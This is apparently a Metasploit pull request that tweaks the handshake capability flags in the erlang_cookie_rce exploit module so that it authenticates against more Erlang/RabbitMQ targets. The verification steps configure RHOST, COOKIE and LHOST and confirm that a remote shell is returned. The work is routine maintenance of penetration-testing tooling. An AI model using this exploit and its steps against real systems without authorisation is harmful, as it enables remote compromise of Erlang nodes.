### PR TITLE
Add DFLAG_BIG_CREATION to capability flags for erlang_cookie_rce.rb

### DIFF
--- a/modules/exploits/multi/misc/erlang_cookie_rce.rb
+++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     send_name << [(@our_node.length+7).to_s(16)].pack('H*') #
     send_name << "\x6e"                                     # Tag: n
     send_name << "\x00\x05"                                 # Version: R6 (5)
-    send_name << "\x00\x03\x49\x9c"                         # Flags (0x0003499c)
+    send_name << "\x00\x07\x49\x9c"                         # Flags (0x0003499c)
     send_name << "#{@our_node}"                             # <generated>@<generated>
 
     # SEND_CHALLENGE_REPLY: return generated digest and its own challenge

--- a/modules/exploits/multi/misc/erlang_cookie_rce.rb
+++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb
@@ -141,7 +141,17 @@ class MetasploitModule < Msf::Exploit::Remote
     send_name << [(@our_node.length+7).to_s(16)].pack('H*') #
     send_name << "\x6e"                                     # Tag: n
     send_name << "\x00\x05"                                 # Version: R6 (5)
-    send_name << "\x00\x07\x49\x9c"                         # Flags (0x0003499c)
+    send_name << "\x00\x07\x49\x9c"                         # Flags (0x0007499c)
+                                                            #   DFLAG_EXTENDED_REFERENCES (0x4)
+                                                            #   DFLAG_DIST_MONITOR        (0x8)
+                                                            #   DFLAG_FUN_TAGS            (0x10)
+                                                            #   DFLAG_NEW_FUN_TAGS.       (0x80)
+                                                            #   DFLAG_EXTENDED_PIDS_PORTS (0x100)
+                                                            #   DFLAG_NEW_FLOATS          (0x800)
+                                                            #   DFLAG_SMALL_ATOM_TAGS     (0x4000)
+                                                            #   DFLAG_UTF8_ATOMS          (0x10000)
+                                                            #   DFLAG_MAP_TAG             (0x20000)
+                                                            #   DFLAG_BIG_CREATION        (0x40000)
     send_name << "#{@our_node}"                             # <generated>@<generated>
 
     # SEND_CHALLENGE_REPLY: return generated digest and its own challenge

--- a/modules/exploits/multi/misc/erlang_cookie_rce.rb
+++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
                                                             #   DFLAG_EXTENDED_REFERENCES (0x4)
                                                             #   DFLAG_DIST_MONITOR        (0x8)
                                                             #   DFLAG_FUN_TAGS            (0x10)
-                                                            #   DFLAG_NEW_FUN_TAGS.       (0x80)
+                                                            #   DFLAG_NEW_FUN_TAGS        (0x80)
                                                             #   DFLAG_EXTENDED_PIDS_PORTS (0x100)
                                                             #   DFLAG_NEW_FLOATS          (0x800)
                                                             #   DFLAG_SMALL_ATOM_TAGS     (0x4000)


### PR DESCRIPTION
I have been having trouble getting this module (and other projects) to work on a specific target. I took some time to analyze the problem and it appears to be with the included capability flag set (0x3499c). In my case (and I suspect others'), the target node was rejecting the client with "not_allowed". After testing I found that simply adding DFLAG_BIG_CREATION (0x40000) allowed this exploit to work, both on the host I was having trouble with, and an older one where this (unmodified) exploit was still working. Breakdown of flags is below.

```
0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100
                   |       |||  |   |  | |  | ||-- DFLAG_EXTENDED_REFERENCES
                   |       |||  |   |  | |  | |-- DFLAG_DIST_MONITOR
                   |       |||  |   |  | |  |-- DFLAG_FUN_TAGS
                   |       |||  |   |  | |-- DFLAG_NEW_FUN_TAGS 
                   |       |||  |   |  |-- DFLAG_EXTENDED_PIDS_PORTS 
                   |       |||  |   |-- DFLAG_NEW_FLOATS 
                   |       |||  |-- DFLAG_SMALL_ATOM_TAGS
                   |       |||-- DFLAG__UTF8_ATOMS
                   |       ||-- DFLAG_MAP_TAG 
                   |       |-- **DFLAG_BIG_CREATION**
                   |-- DFLAG_HANDSHAKE_23
```

---

This fixes the `send_name` procedure in this exploit for some hosts which support slightly different capability flags. The updated flags also appear to continue working against hosts where this exploit worked previously.

## Verification

List the steps needed to make sure this thing works

- [x] Install the Erlang Port Mapper Daemon
- [x] Install RabbitMQ
- [x] Start `msfconsole`
- [x] `use exploit/multi/misc/erlang_cookie_rce`
- [x] `set RHOST <ip>`
- [x] `set COOKIE <cookie>`
- [x] `set TARGET <target>`
- [x] `set LHOST <host>`
- [x] `exploit`
- [x] **Verify** shell is returned
